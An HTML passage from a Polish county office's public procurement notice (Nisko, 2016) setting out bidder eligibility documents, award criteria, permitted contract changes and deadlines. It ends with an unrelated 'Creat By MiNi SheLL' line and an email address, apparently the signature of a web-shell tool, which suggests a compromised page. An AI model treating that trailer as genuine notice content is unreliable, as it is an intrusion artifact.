<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku 	udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku 	udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku 	udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>złożenie formularza ofertowego wraz załącznikami Pełnomocnictwo do reprezentowania Wykonawcy w niniejszym postępowaniu oraz do podpisania umowy (o ile nie wynika to z dokumentów rejestrowych) Pełnomocnictwo osób podpisujących ofertę do reprezentowania Wykonawcy, zaciągania w jego imieniu zobowiązań finansowych w wysokości odpowiadającej cenie oferty oraz podpisania oferty musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli pełnomocnictwo takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej), to do oferty należy dołączyć oryginał lub poświadczoną za zgodność z oryginałem przez notariusza, kopię pełnomocnictwa wystawionego na reprezentanta Wykonawcy przez osoby do tego upełnomocnione</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne są następujące przypadki i warunki zmiany umowy zmiana wysokości wynagrodzenia określonego w § 7 ust. 1 umowy w przypadku ustawowej zmiany wysokości stawki podatku od towarów i usług zmiana terminu realizacji przedmiotu zamówienia, w przypadku gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży i interesie Zamawiającego wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia gdy zachowanie istniejących postanowień umowy będzie niemożliwe wskutek decyzji lub innych rozstrzygnięć organów administracji, gdy zmiana będzie konieczna w celu umożliwienia wykonania umowy w sposób zgodny z obowiązującymi przepisami prawa,gdy zaistnieją okoliczności wystąpienia siły wyższej i konieczne będzie dostosowanie sposobu wykonania umowy do zmienionych okoliczności, gdy zostaną wykryte omyłki, rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a zmiana umożliwi ich usuniecie i pozwoli doprecyzować zapisy umowy w celu jednoznacznej interpretacji jej zapisów, gdy nastąpi zmiana w zakresie zgodnym z przepisem art. 144 ust. 1 Pzp tj. takimi które nie będą stanowiły istotnych zmian postanowień umowy. Zmiany umowy przewidziane w ust. 2 pkt 1 i 2 dopuszczalne są na następujących warunkach ad pkt. 1) od daty wejścia w życie zmienionej stawki podatku od towarów i usług (VAT) i w zakresie zmiany tej stawki
2) ad pkt 2) lit. a - w zakresie uzgodnionego interesu Zamawiającego, lit. b - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-nisko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nisku, Plac Wolności 2, 37-400 Nisko- Wydział Gospodarki Mieniem Powiatu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2016 godzina 10:45, miejsce: Starostwo Powiatowe w Nisku, Plac Wolności 2, 37-400 Nisko w Biurze Obsługi Interesanta (pok. nr 1).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com